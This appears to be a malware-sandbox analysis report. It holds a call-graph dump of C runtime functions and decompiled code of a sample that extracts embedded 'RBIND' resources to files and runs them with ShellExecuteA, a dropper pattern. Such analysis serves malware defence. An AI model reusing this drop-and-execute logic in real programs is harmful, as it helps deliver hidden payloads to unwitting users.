3c784d 5481->5484 5485 3c7860 5484->5485 5491 3c7873 5484->5491 5487 3c7892 5485->5487 5489 3c3f5e __getptd 66 API calls 5485->5489 5485->5491 5486 3c3f5e __getptd 66 API calls 5488 3c7884 5486->5488 5488->5487 5490 3c3f5e __getptd 66 API calls 5488->5490 5489->5491 5490->5487 5491->5486 5819 3c749b 5820 3c2701 __NMSG_WRITE 5 API calls 5819->5820 5821 3c74af 5820->5821 5822 3c83b3 ___InternalCxxFrameHandler 71 API calls 5821->5822 5823 3c74c8 5822->5823 5492 3c1010 5495 3c27f4 5492->5495 5494 3c1021 moneypunct 5497 3c277a 5495->5497 5496 3c278e 5496->5494 5497->5496 5498 3c352b _free 66 API calls 5497->5498 5498->5496 5499 3c6810 RtlUnwind 5500 3c8710 5501 3c1420 77 API calls 5500->5501 5502 3c8726 5501->5502 5503 3c309b __cinit 76 API calls 5502->5503 5504 3c8730 5503->5504 5827 3c4991 SetUnhandledExceptionFilter 5828 3c7b8f 5831 3c7978 5828->5831 5830 3c7b97 5832 3c79ba 5831->5832 5833 3c7982 5831->5833 5832->5830 5833->5832 5834 3c3f5e __getptd 66 API calls 5833->5834 5835 3c79ae 5834->5835 5835->5830 5505 3c7a09 5506 3c3925 __CxxUnhandledExceptionFilter 68 API calls 5505->5506 5507 3c7a11 5506->5507 5508 3c320a 5511 3c499f 5508->5511 5512 3c3ee5 __getptd_noexit 66 API calls 5511->5512 5513 3c321b 5512->5513 5517 3c3f78 5519 3c3f84 __setmbcp 5517->5519 5518 3c3f9c 5521 3c3faa 5518->5521 5523 3c352b _free 66 API calls 5518->5523 5519->5518 5520 3c352b _free 66 API calls 5519->5520 5522 3c4086 __setmbcp 5519->5522 5520->5518 5524 3c352b _free 66 API calls 5521->5524 5527 3c3fb8 5521->5527 5523->5521 5524->5527 5525 3c352b _free 66 API calls 5528 3c3fc6 5525->5528 5526 3c3fd4 5530 3c3fe2 5526->5530 5531 3c352b _free 66 API calls 5526->5531 5527->5525 5527->5528 5528->5526 5529 3c352b _free 66 API calls 5528->5529 5529->5526 5532 3c3ff0 5530->5532 5533 3c352b _free 66 API calls 5530->5533 5531->5530 5534 3c4001 5532->5534 5535 3c352b _free 66 API calls 5532->5535 5533->5532 5536 3c38f2 __lock 66 API calls 5534->5536 5535->5534 5537 3c4009 5536->5537 5538 3c402e 
5537->5538 5539 3c4015 InterlockedDecrement 5537->5539 5553 3c4092 5538->5553 5539->5538 5540 3c4020 5539->5540 5540->5538 5543 3c352b _free 66 API calls 5540->5543 5543->5538 5544 3c38f2 __lock 66 API calls 5545 3c4042 5544->5545 5546 3c4073 5545->5546 5547 3c58c9 ___removelocaleref 8 API calls 5545->5547 5556 3c409e 5546->5556 5551 3c4057 5547->5551 5550 3c352b _free 66 API calls 5550->5522 5551->5546 5552 3c5962 ___freetlocinfo 66 API calls 5551->5552 5552->5546 5559 3c3819 LeaveCriticalSection 5553->5559 5555 3c403b 5555->5544 5560 3c3819 LeaveCriticalSection 5556->5560 5558 3c4080 5558->5550 5559->5555 5560->5558 5569 3c3668 IsProcessorFeaturePresent 5570 3c7465 5573 3c83b3 5570->5573 5574 3c3f5e __getptd 66 API calls 5573->5574 5575 3c83c0 5574->5575 5576 3c8404 5575->5576 5577 3c748b 5575->5577 5580 3c8427 5575->5580 5576->5577 5581 3c789c 5576->5581 5580->5577 5591 3c8021 5580->5591 5582 3c78a8 __setmbcp 5581->5582 5583 3c3f5e __getptd 66 API calls 5582->5583 5586 3c78c8 __CallSettingFrame@12 5583->5586 5584 3c7939 5585 3c795e ___FrameUnwindToState 66 API calls 5584->5585 5588 3c7945 5585->5588 5586->5584 5587 3c3971 ___FrameUnwindToState 69 API calls 5586->5587 5587->5586 5589 3c3971 ___FrameUnwindToState 69 API calls 5588->5589 5590 3c794f __setmbcp 5588->5590 5589->5590 5590->5577 5592 3c8040 5591->5592 5593 3c3971 ___FrameUnwindToState 69 API calls 5592->5593 5597 3c805a 5592->5597 5593->5597 5594 3c837b 5596 3c3f5e __getptd 66 API calls 5594->5596 5595 3c8362 5667 3c7f1a 5595->5667 5600 3c8383 5596->5600 5602 3c3f5e __getptd 66 API calls 5597->5602 5627 3c8139 FindHandler type_info::operator== ___TypeMatch 5597->5627 5598 3c3925 __CxxUnhandledExceptionFilter 68 API calls 5598->5627 5601 3c8391 5600->5601 5603 3c3971 ___FrameUnwindToState 69 API calls 5600->5603 5601->5577 5604 3c80a1 5602->5604 5603->5601 5604->5601 5606 3c3f5e __getptd 66 API calls 5604->5606 5608 3c80b3 5606->5608 5607 3c2798 std::exception::exception 66 API calls 5607->5627 5609 
3c3f5e __getptd 66 API calls 5608->5609 5612 3c80c1 FindHandler 5609->5612 5610 3c3252 __CxxThrowException@8 RaiseException 5610->5627 5611 3c7a3b IsInExceptionSpec 69 API calls 5611->5627 5613 3c3971 ___FrameUnwindToState 69 API calls 5612->5613 5617 3c80dd 5612->5617 5613->5617 5614 3c8107 5615 3c3f5e __getptd 66 API calls 5614->5615 5616 3c810c 5615->5616 5620 3c3f5e __getptd 66 API calls 5616->5620 5616->5627 5617->5614 5619 3c3971 ___FrameUnwindToState 69 API calls 5617->5619 5619->5614 5622 3c811e 5620->5622 5621 3c3f5e 66 API calls __getptd 5621->5627 5623 3c3f5e __getptd 66 API calls 5622->5623 5624 3c8129 5623->5624 5630 3c7a3b 5624->5630 5627->5594 5627->5595 5627->5598 5627->5607 5627->5610 5627->5611 5627->5621 5628 3c789c ___FrameUnwindToState 69 API calls 5627->5628 5636 3c7644 5627->5636 5642 3c7eac 5627->5642 5652 3c7411 RtlUnwind 5627->5652 5653 3c7ab6 5627->5653 5628->5627 5631 3c7a47 5630->5631 5635 3c7a51 ___TypeMatch 5630->5635 5632 3c3971 ___FrameUnwindToState 69 API calls 5631->5632 5633 3c7a4c 5632->5633 5634 3c3925 __CxxUnhandledExceptionFilter 68 API calls 5633->5634 5634->5635 5635->5627 5637 3c765d 5636->5637 5638 3c7691 5637->5638 5641 3c3971 ___FrameUnwindToState 69 API calls 5637->5641 5639 3c76aa 5638->5639 5640 3c3971 ___FrameUnwindToState 69 API calls 5638->5640 5639->5627 5640->5639 5641->5637 5643 3c7eb7 5642->5643 5645 3c7ec4 5642->5645 5683 3c7e1a 5643->5683 5687 3c7411 RtlUnwind 5645->5687 5647 3c7edb 5648 3c789c ___FrameUnwindToState 69 API calls 5647->5648 5649 3c7ee9 5648->5649 5688 3c7aff 5649->5688 5651 3c7f0a FindHandlerForForeignException 5651->5627 5652->5627 5654 3c7ac2 __EH_prolog3_catch 5653->5654 5655 3c3f5e __getptd 66 API calls 5654->5655 5656 3c7ac7 5655->5656 5657 3c7ad5 5656->5657 5659 3c3971 ___FrameUnwindToState 69 API calls 5656->5659 5731 3c395e 5657->5731 5659->5657 5668 3c7f32 5667->5668 5678 3c801c 5667->5678 5669 3c3f5e __getptd 66 API calls 5668->5669 5670 3c7f38 5669->5670 5671 3c7f7d 5670->5671 5672 
3c3f5e __getptd 66 API calls 5670->5672 5673 3c7f96 5671->5673 5675 3c3971 ___FrameUnwindToState 69 API calls 5671->5675 5671->5678 5674 3c7f46 5672->5674 5676 3c7644 _GetRangeOfTrysToCheck 69 API calls 5673->5676 5734 3c3dae RtlEncodePointer 5674->5734 5675->5673 5679 3c7fab 5676->5679 5678->5594 5679->5678 5682 3c7eac FindHandlerForForeignException 70 API calls 5679->5682 5680 3c7f51 5680->5671 5735 3c74ce 5680->5735 5682->5679 5684 3c7e26 __setmbcp 5683->5684 5702 3c7c9b 5684->5702 5686 3c7e55 ___BuildCatchObject __setmbcp 5686->5645 5687->5647 5689 3c7b0b __setmbcp 5688->5689 5706 3c76b7 5689->5706 5692 3c3f5e __getptd 66 API calls 5693 3c7b36 5692->5693 5694 3c3f5e __getptd 66 API calls 5693->5694 5695 3c7b44 5694->5695 5696 3c3f5e __getptd 66 API calls 5695->5696 5697 3c7b52 5696->5697 5698 3c3f5e __getptd 66 API calls 5697->5698 5699 3c7b5d _CallCatchBlock2 5698->5699 5711 3c7c25 5699->5711 5701 3c7c11 __setmbcp 5701->5651 5703 3c7ca7 FindHandler __setmbcp 5702->5703 5704 3c3971 ___FrameUnwindToState 69 API calls 5703->5704 5705 3c7d14 ___BuildCatchObject _memmove __setmbcp 5703->5705 5704->5705 5705->5686 5707 3c3f5e __getptd 66 API calls 5706->5707 5708 3c76ca 5707->5708 5709 3c3f5e __getptd 66 API calls 5708->5709 5710 3c76d8 5709->5710 5710->5692 5720 3c770a 5711->5720 5714 3c3f5e __getptd 66 API calls 5715 3c7c39 5714->5715 5716 3c3f5e __getptd 66 API calls 5715->5716 5718 3c7c47 5716->5718 5717 3c7c8a FindHandler 5717->5701 5718->5717 5728 3c76e3 5718->5728 5721 3c3f5e __getptd 66 API calls 5720->5721 5722 3c7715 5721->5722 5723 3c7720 5722->5723 5724 3c7731 5722->5724 5726 3c3f5e __getptd 66 API calls 5723->5726 5725 3c3f5e __getptd 66 API calls 5724->5725 5727 3c7725 5725->5727 5726->5727 5727->5714 5729 3c3f5e __getptd 66 API calls 5728->5729 5730 3c76ed 5729->5730 5730->5717 5732 3c3f5e __getptd 66 API calls 5731->5732 5733 3c3963 5732->5733 5733->5733 5734->5680 5736 3c74f2 5735->5736 5738 3c74e0 5735->5738 5737 3c3f5e __getptd 66 API calls 
5736->5737 5737->5738 5738->5671 4162 3c30db 4202 3c4440 4162->4202 4164 3c30e7 GetStartupInfoW 4165 3c30fb HeapSetInformation 4164->4165 4168 3c3106 4164->4168 4165->4168 4167 3c3154 4169 3c315f 4167->4169 4310 3c30b2 4167->4310 4203 3c5155 HeapCreate 4168->4203 4204 3c40a7 GetModuleHandleW 4169->4204 4172 3c3165 4173 3c3170 __RTC_Initialize 4172->4173 4174 3c30b2 _fast_error_exit 66 API calls 4172->4174 4229 3c4f10 GetStartupInfoW 4173->4229 4174->4173 4177 3c318a GetCommandLineA 4242 3c4e79 GetEnvironmentStringsW 4177->4242 4184 3c31af 4266 3c4b48 4184->4266 4185 3c2eda __amsg_exit 66 API calls 4185->4184 4187 3c31b5 4188 3c31c0 4187->4188 4189 3c2eda __amsg_exit 66 API calls 4187->4189 4286 3c2cb9 4188->4286 4189->4188 4191 3c31c8 4192 3c31d3 4191->4192 4193 3c2eda __amsg_exit 66 API calls 4191->4193 4292 3c4ae9 4192->4292 4193->4192 4197 3c31f5 4198 3c3203 4197->4198 4307 3c2e90 4197->4307 4325 3c2ebc 4198->4325 4201 3c3208 __setmbcp 4202->4164 4203->4167 4205 3c40bb 4204->4205 4206 3c40c4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4204->4206 4328 3c3df4 4205->4328 4208 3c410e TlsAlloc 4206->4208 4211 3c415c TlsSetValue 4208->4211 4212 3c421d 4208->4212 4211->4212 4213 3c416d 4211->4213 4212->4172 4333 3c2c62 4213->4333 4218 3c4218 4220 3c3df4 __mtterm 2 API calls 4218->4220 4219 3c41b5 DecodePointer 4221 3c41ca 4219->4221 4220->4212 4221->4218 4342 3c4882 4221->4342 4224 3c41e8 DecodePointer 4225 3c41f9 4224->4225 4225->4218 4226 3c41fd 4225->4226 4348 3c3e31 4226->4348 4228 3c4205 GetCurrentThreadId 4228->4212 4230 3c4882 __calloc_crt 66 API calls 4229->4230 4231 3c4f2e 4230->4231 4232 3c50a3 4231->4232 4235 3c4882 __calloc_crt 66 API calls 4231->4235 4236 3c317e 4231->4236 4238 3c5023 4231->4238 4233 3c50d9 GetStdHandle 4232->4233 4234 3c513d SetHandleCount 4232->4234 4237 3c50eb GetFileType 4232->4237 4241 3c5111 InitializeCriticalSectionAndSpinCount 4232->4241 4233->4232 4234->4236 4235->4231 4236->4177 4318 3c2eda 4236->4318 4237->4232 
4238->4232 4239 3c504f GetFileType 4238->4239 4240 3c505a InitializeCriticalSectionAndSpinCount 4238->4240 4239->4238 4239->4240 4240->4236 4240->4238 4241->4232 4241->4236 4243 3c4e95 WideCharToMultiByte 4242->4243 4244 3c319a 4242->4244 4246 3c4eca 4243->4246 4247 3c4f02 FreeEnvironmentStringsW 4243->4247 4255 3c4dbe 4244->4255 4248 3c483d __malloc_crt 66 API calls 4246->4248 4247->4244 4249 3c4ed0 4248->4249 4249->4247 4250 3c4ed8 WideCharToMultiByte 4249->4250 4251 3c4eea 4250->4251 4252 3c4ef6 FreeEnvironmentStringsW 4250->4252 4253 3c352b _free 66 API calls 4251->4253 4252->4244 4254 3c4ef2 4253->4254 4254->4252 4256 3c4dd8 GetModuleFileNameA 4255->4256 4257 3c4dd3 4255->4257 4258 3c4dff 4256->4258 4597 3c6239 4257->4597 4591 3c4c24 4258->4591 4261 3c31a4 4261->4184 4261->4185 4263 3c483d __malloc_crt 66 API calls 4264 3c4e41 4263->4264 4264->4261 4265 3c4c24 _parse_cmdline 76 API calls 4264->4265 4265->4261 4267 3c4b51 4266->4267 4270 3c4b56 _strlen 4266->4270 4268 3c6239 ___initmbctable 94 API calls 4267->4268 4268->4270 4269 3c4882 __calloc_crt 66 API calls 4276 3c4b8b _strlen 4269->4276 4270->4269 4273 3c4b64 4270->4273 4271 3c4bda 4272 3c352b _free 66 API calls 4271->4272 4272->4273 4273->4187 4274 3c4882 __calloc_crt 66 API calls 4274->4276 4275 3c4c00 4277 3c352b _free 66 API calls 4275->4277 4276->4271 4276->4273 4276->4274 4276->4275 4279 3c4c17 4276->4279 5038 3c33a4 4276->5038 4277->4273 4280 3c3d15 __invoke_watson 10 API calls 4279->4280 4282 3c4c23 4280->4282 4281 3c674d __wincmdln 76 API calls 4281->4282 4282->4281 4284 3c4cb0 4282->4284 4283 3c4dae 4283->4187 4284->4283 4285 3c674d 76 API calls __wincmdln 4284->4285 4285->4284 4288 3c2cc7 __IsNonwritableInCurrentImage 4286->4288 5047 3c42c3 4288->5047 4289 3c2ce5 __initterm_e 4291 3c2d06 __IsNonwritableInCurrentImage 4289->4291 5050 3c309b 4289->5050 4291->4191 4293 3c4af7 4292->4293 4295 3c4afc 4292->4295 4294 3c6239 ___initmbctable 94 API calls 4293->4294 4294->4295 4296 3c31d9 4295->4296 
4297 3c674d __wincmdln 76 API calls 4295->4297 4298 3c1320 LoadLibraryA 4296->4298 4297->4295 4299 3c1330 4298->4299 4300 3c133a GetProcAddress 4299->4300 4301 3c2e90 66 API calls 4299->4301 4302 3c135b 4300->4302 4303 3c1354 4300->4303 4301->4300 5115 3c1eb0 4302->5115 4304 3c2e90 66 API calls 4303->4304 4304->4302 5329 3c2d50 4307->5329 4309 3c2ea1 4309->4198 4311 3c30c5 4310->4311 4312 3c30c0 4310->4312 4314 3c4655 __NMSG_WRITE 66 API calls 4311->4314 4313 3c4804 __FF_MSGBANNER 66 API calls 4312->4313 4313->4311 4315 3c30cd 4314->4315 4316 3c2c38 _doexit 3 API calls 4315->4316 4317 3c30d7 4316->4317 4317->4169 4319 3c4804 __FF_MSGBANNER 66 API calls 4318->4319 4320 3c2ee4 4319->4320 4321 3c4655 __NMSG_WRITE 66 API calls 4320->4321 4322 3c2eec 4321->4322 5359 3c2ea6 4322->5359 4326 3c2d50 _doexit 66 API calls 4325->4326 4327 3c2ec7 4326->4327 4327->4201 4329 3c3dfe DecodePointer 4328->4329 4330 3c3e0d 4328->4330 4329->4330 4331 3c3e2c 4330->4331 4332 3c3e1e TlsFree 4330->4332 4331->4331 4332->4331 4361 3c3dae RtlEncodePointer 4333->4361 4335 3c2c6a __init_pointers __initp_misc_winsig 4362 3c39a9 EncodePointer 4335->4362 4337 3c2c90 EncodePointer EncodePointer EncodePointer EncodePointer 4338 3c3778 4337->4338 4339 3c3783 4338->4339 4340 3c378d InitializeCriticalSectionAndSpinCount 4339->4340 4341 3c37b0 4339->4341 4340->4339 4340->4341 4341->4218 4341->4219 4345 3c488b 4342->4345 4344 3c41e0 4344->4218 4344->4224 4345->4344 4346 3c48a9 Sleep 4345->4346 4363 3c65cb 4345->4363 4347 3c48be 4346->4347 4347->4344 4347->4345 4400 3c4440 4348->4400 4350 3c3e3d GetModuleHandleW 4401 3c38f2 4350->4401 4352 3c3e7b InterlockedIncrement 4408 3c3ed3 4352->4408 4355 3c38f2 __lock 64 API calls 4356 3c3e9c 4355->4356 4411 3c583a InterlockedIncrement 4356->4411 4358 3c3eba 4423 3c3edc 4358->4423 4360 3c3ec7 __setmbcp 4360->4228 4361->4335 4362->4337 4364 3c65d7 4363->4364 4366 3c65f2 4363->4366 4365 3c65e3 4364->4365 4364->4366 4372 3c4264 4365->4372 4367 3c6605 RtlAllocateHeap 
4366->4367 4369 3c662c 4366->4369 4375 3c3d86 DecodePointer 4366->4375 4367->4366 4367->4369 4369->4345 4377 3c3ee5 GetLastError 4372->4377 4374 3c4269 4374->4345 4376 3c3d9b 4375->4376 4376->4366 4391 3c3dc0 TlsGetValue 4377->4391 4380 3c3f52 SetLastError 4380->4374 4381 3c4882 __calloc_crt 62 API calls 4382 3c3f10 4381->4382 4382->4380 4383 3c3f18 DecodePointer 4382->4383 4384 3c3f2d 4383->4384 4385 3c3f49 4384->4385 4386 3c3f31 4384->4386 4394 3c352b 4385->4394 4388 3c3e31 __initptd 62 API calls 4386->4388 4390 3c3f39 GetCurrentThreadId 4388->4390 4389 3c3f4f 4389->4380 4390->4380 4392 3c3dd5 DecodePointer TlsSetValue 4391->4392 4393 3c3df0 4391->4393 4392->4393 4393->4380 4393->4381 4395 3c3536 HeapFree 4394->4395 4399 3c355f _free 4394->4399 4396 3c354b 4395->4396 4395->4399 4397 3c4264 __setmbcp 64 API calls 4396->4397 4398 3c3551 GetLastError 4397->4398 4398->4399 4399->4389 4400->4350 4402 3c391a EnterCriticalSection 4401->4402 4403 3c3907 4401->4403 4402->4352 4426 3c3830 4403->4426 4405 3c390d 4405->4402 4406 3c2eda __amsg_exit 65 API calls 4405->4406 4407 3c3919 4406->4407 4407->4402 4589 3c3819 LeaveCriticalSection 4408->4589 4410 3c3e95 4410->4355 4412 3c5858 InterlockedIncrement 4411->4412 4413 3c585b 4411->4413 4412->4413 4414 3c5868 4413->4414 4415 3c5865 InterlockedIncrement 4413->4415 4416 3c5875 4414->4416 4417 3c5872 InterlockedIncrement 4414->4417 4415->4414 4418 3c587f InterlockedIncrement 4416->4418 4420 3c5882 4416->4420 4417->4416 4418->4420 4419 3c589b InterlockedIncrement 4419->4420 4420->4419 4421 3c58b6 InterlockedIncrement 4420->4421 4422 3c58ab InterlockedIncrement 4420->4422 4421->4358 4422->4420 4590 3c3819 LeaveCriticalSection 4423->4590 4425 3c3ee3 4425->4360 4427 3c383c __setmbcp 4426->4427 4428 3c3862 4427->4428 4451 3c4804 4427->4451 4436 3c3872 __setmbcp 4428->4436 4487 3c483d 4428->4487 4434 3c3884 4438 3c4264 __setmbcp 65 API calls 4434->4438 4435 3c3893 4439 3c38f2 __lock 65 API calls 4435->4439 4436->4405 4438->4436 4441 
3c389a 4439->4441 4442 3c38cd 4441->4442 4443 3c38a2 InitializeCriticalSectionAndSpinCount 4441->4443 4444 3c352b _free 65 API calls 4442->4444 4445 3c38be 4443->4445 4446 3c38b2 4443->4446 4444->4445 4493 3c38e9 4445->4493 4447 3c352b _free 65 API calls 4446->4447 4449 3c38b8 4447->4449 4450 3c4264 __setmbcp 65 API calls 4449->4450 4450->4445 4496 3c658c 4451->4496 4453 3c480b 4454 3c658c __NMSG_WRITE 66 API calls 4453->4454 4458 3c4818 4453->4458 4454->4458 4455 3c4655 __NMSG_WRITE 66 API calls 4456 3c4830 4455->4456 4459 3c4655 __NMSG_WRITE 66 API calls 4456->4459 4457 3c3851 4460 3c4655 4457->4460 4458->4455 4458->4457 4459->4457 4461 3c4676 __NMSG_WRITE 4460->4461 4463 3c658c __NMSG_WRITE 63 API calls 4461->4463 4483 3c4792 4461->4483 4465 3c4690 4463->4465 4464 3c3858 4484 3c2c38 4464->4484 4466 3c47a1 GetStdHandle 4465->4466 4467 3c658c __NMSG_WRITE 63 API calls 4465->4467 4470 3c47af _strlen 4466->4470 4466->4483 4468 3c46a1 4467->4468 4468->4466 4469 3c46b3 4468->4469 4469->4483 4521 3c6529 4469->4521 4473 3c47e5 WriteFile 4470->4473 4470->4483 4473->4483 4474 3c46df GetModuleFileNameW 4475 3c4700 4474->4475 4479 3c470c _wcslen 4474->4479 4476 3c6529 __NMSG_WRITE 63 API calls 4475->4476 4476->4479 4477 3c3d15 __invoke_watson 10 API calls 4477->4479 4478 3c63cc 63 API calls __NMSG_WRITE 4478->4479 4479->4477 4479->4478 4481 3c4782 4479->4481 4530 3c6441 4479->4530 4539 3c6260 4481->4539 4557 3c2701 4483->4557 4567 3c2c0d GetModuleHandleW 4484->4567 4490 3c4846 4487->4490 4489 3c387d 4489->4434 4489->4435 4490->4489 4491 3c485d Sleep 4490->4491 4571 3c3403 4490->4571 4492 3c4872 4491->4492 4492->4489 4492->4490 4588 3c3819 LeaveCriticalSection 4493->4588 4495 3c38f0 4495->4436 4497 3c6598 4496->4497 4498 3c65a2 4497->4498 4499 3c4264 __setmbcp 66 API calls 4497->4499 4498->4453 4500 3c65bb 4499->4500 4503 3c3d67 4500->4503 4506 3c3d3a DecodePointer 4503->4506 4507 3c3d4f 4506->4507 4512 3c3d15 4507->4512 4509 3c3d66 4510 3c3d3a _raise 10 API calls 4509->4510 

                                                    Control-flow Graph

                                                    C-Code - Quality: 100%
                                                    			E003C1320(intOrPtr __edx) {
                                                    				struct HINSTANCE__* _t1;
                                                    				_Unknown_base(*)()* _t2;
                                                    				struct HINSTANCE__* _t5;
                                                    				intOrPtr _t8;
                                                    
                                                    				_t8 = __edx;
                                                    				_t1 = LoadLibraryA("shell32.dll");
                                                    				 *0x3ce940 = _t1;
                                                    				if(_t1 == 0) {
                                                    					_t1 = E003C2E90(_t1);
                                                    				}
                                                    				_t2 = GetProcAddress(_t1, "ShellExecuteA");
                                                    				 *0x3ce944 = _t2;
                                                    				if(__imp__ShellExecuteA == 0) {
                                                    					E003C2E90(0);
                                                    				}
                                                    				E003C1EB0(_t8, __imp__ShellExecuteA);
                                                    				EnumResourceNamesA(0, "RBIND", E003C10C0, 0);
                                                    				_t5 =  *0x3ce940; // 0x75390000
                                                    				return FreeLibrary(_t5);
                                                    			}








                                                    APIs
                                                    • LoadLibraryA.KERNEL32(shell32.dll,003C31F5,003C0000,00000000,00000000,0000000A), ref: 003C1325
                                                    • GetProcAddress.KERNEL32(?,ShellExecuteA), ref: 003C1340
                                                    • EnumResourceNamesA.KERNEL32 ref: 003C136E
                                                    • FreeLibrary.KERNEL32(75390000,?,ShellExecuteA), ref: 003C137A
                                                      • Part of subcall function 003C2E90: _doexit.LIBCMT ref: 003C2E9C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$AddressEnumFreeLoadNamesProcResource_doexit
                                                    • String ID: RBIND$ShellExecuteA$shell32.dll
                                                    • API String ID: 2421111958-1274833461
                                                    • Opcode ID: 0a4a16954f388ae6fa05230756437b6a5d41e5a81e01f400ef11a0b9cd90afc7
                                                    • Instruction ID: ad95c464750cb9c602fd31bade1e95c2b3b1760a84c19e7ca947a6cf37c70a78
                                                    • Opcode Fuzzy Hash: 0a4a16954f388ae6fa05230756437b6a5d41e5a81e01f400ef11a0b9cd90afc7
                                                    • Instruction Fuzzy Hash: 74F0ED75A41321A7D763BBB09C0FF8B76AD7710706F06040AF905E51A2DBB5B8409B26
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 75%
                                                    			E003C10C0(void* __eflags, CHAR* _a8, void* _a12) {
                                                    				void* _v8;
                                                    				char _v16;
                                                    				signed int _v20;
                                                    				char _v279;
                                                    				char _v280;
                                                    				intOrPtr _v288;
                                                    				void* _v292;
                                                    				CHAR* _v308;
                                                    				intOrPtr _v316;
                                                    				intOrPtr _v320;
                                                    				char _v336;
                                                    				CHAR* _v340;
                                                    				CHAR* _v344;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t48;
                                                    				signed int _t49;
                                                    				intOrPtr* _t54;
                                                    				void* _t55;
                                                    				unsigned int _t56;
                                                    				void* _t59;
                                                    				CHAR* _t63;
                                                    				void* _t66;
                                                    				long _t67;
                                                    				intOrPtr _t72;
                                                    				void* _t86;
                                                    				char _t88;
                                                    				void _t89;
                                                    				void _t90;
                                                    				signed int _t92;
                                                    				void _t97;
                                                    				void* _t106;
                                                    				void* _t107;
                                                    				void* _t108;
                                                    				void* _t113;
                                                    				void* _t115;
                                                    				void* _t121;
                                                    				void* _t123;
                                                    				void* _t128;
                                                    				struct HRSRC__* _t131;
                                                    				intOrPtr _t132;
                                                    				void* _t133;
                                                    				signed int _t134;
                                                    				void* _t135;
                                                    				void* _t137;
                                                    				void* _t139;
                                                    
                                                    				_push(0xffffffff);
                                                    				_push(E003C85CB);
                                                    				_push( *[fs:0x0]);
                                                    				_t48 =  *0x3cd07c; // 0xbd8f316a
                                                    				_t49 = _t48 ^ _t134;
                                                    				_v20 = _t49;
                                                    				_push(_t49);
                                                    				 *[fs:0x0] =  &_v16;
                                                    				_t113 = _a12;
                                                    				_v344 = _a8;
                                                    				_v340 = _t113;
                                                    				_v280 = 0;
                                                    				E003C57C0( &_v279, 0, 0x103);
                                                    				_t137 = _t135 - 0x148 + 0xc;
                                                    				E003C23A0( &_v279,  &_v336);
                                                    				_v8 = 0;
                                                    				_t54 = E003C2370( &_v279,  &_v308);
                                                    				if( *((intOrPtr*)(_t54 + 0x14)) >= 0x10) {
                                                    					_t54 =  *_t54;
                                                    				}
                                                    				_t106 =  &_v280 - _t54;
                                                    				do {
                                                    					_t88 =  *_t54;
                                                    					 *((char*)(_t106 + _t54)) = _t88;
                                                    					_t54 = _t54 + 1;
                                                    				} while (_t88 != 0);
                                                    				if(_v288 >= 0x10) {
                                                    					_push(_v308);
                                                    					E003C2BB1();
                                                    					_t137 = _t137 + 4;
                                                    				}
                                                    				_t55 = _t113;
                                                    				_t107 = _t113;
                                                    				do {
                                                    					_t89 =  *_t55;
                                                    					_t55 = _t55 + 1;
                                                    				} while (_t89 != 0);
                                                    				_t56 = _t55 - _t107;
                                                    				_t115 =  &_v280 - 1;
                                                    				do {
                                                    					_t90 =  *(_t115 + 1);
                                                    					_t115 = _t115 + 1;
                                                    				} while (_t90 != 0);
                                                    				_t92 = _t56 >> 2;
                                                    				_t128 = _t107;
                                                    				_t59 = memcpy(_t128 + _t92 + _t92, _t128, memcpy(_t115, _t128, _t92 << 2) & 0x00000003);
                                                    				_t139 = _t137 + 0x18;
                                                    				_v288 = 0xf;
                                                    				_v292 = 0;
                                                    				_v308 = 0;
                                                    				_t108 = _t59 + 1;
                                                    				do {
                                                    					_t97 =  *_t59;
                                                    					_t59 = _t59 + 1;
                                                    				} while (_t97 != 0);
                                                    				E003C1420( &_v280, _t59 - _t108,  &_v308);
                                                    				_t63 = _v308;
                                                    				if(_v288 < 0x10) {
                                                    					_t63 =  &_v308;
                                                    				}
                                                    				OutputDebugStringA(_t63); // executed
                                                    				if(_v288 >= 0x10) {
                                                    					_push(_v308);
                                                    					E003C2BB1();
                                                    					_t139 = _t139 + 4;
                                                    				}
                                                    				_t131 = FindResourceA(0, _v340, _v344);
                                                    				_t66 = CreateFileA( &_v280, 0x40000000, 2, 0, 2, 0x80, 0); // executed
                                                    				_t121 = _t66;
                                                    				_t67 = SizeofResource(0, _t131);
                                                    				WriteFile(_t121, LockResource(LoadResource(0, _t131)), _t67, _v340, 0); // executed
                                                    				FindCloseChangeNotification(_t121); // executed
                                                    				_t132 = _v320;
                                                    				_t72 = _t132;
                                                    				if(_t132 >= 1) {
                                                    					_t72 = 1;
                                                    				}
                                                    				_t110 = _v336;
                                                    				if(_v316 < 0x10) {
                                                    					_t110 =  &_v336;
                                                    				}
                                                    				if(E003C1040(_t72, "2", _t110) != 0 || _t132 < 1 || (0 | _t132 != 0x00000001) != 0) {
                                                    					_t110 =  &_v280;
                                                    					ShellExecuteA(0, "open",  &_v280, 0, 0, 5); // executed
                                                    				}
                                                    				if(_v316 >= 0x10) {
                                                    					_push(_v336);
                                                    					E003C2BB1();
                                                    				}
                                                    				 *[fs:0x0] = _v16;
                                                    				_pop(_t123);
                                                    				_pop(_t133);
                                                    				_pop(_t86);
                                                    				return E003C2701(1, _t86, _v20 ^ _t134, _t110, _t123, _t133);
                                                    			}

                                                    Statement addresses: 0x003c10c3 to 0x003c1310

                                                    APIs
                                                    • _memset.LIBCMT ref: 003C1115
                                                    • OutputDebugStringA.KERNELBASE(?), ref: 003C11F6
                                                    • FindResourceA.KERNEL32(00000000,?,?), ref: 003C1222
                                                    • CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 003C1241
                                                    • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 003C1253
                                                    • LoadResource.KERNEL32(00000000,00000000,00000000), ref: 003C125C
                                                    • LockResource.KERNEL32(00000000), ref: 003C1263
                                                    • WriteFile.KERNELBASE(00000000,00000000), ref: 003C126B
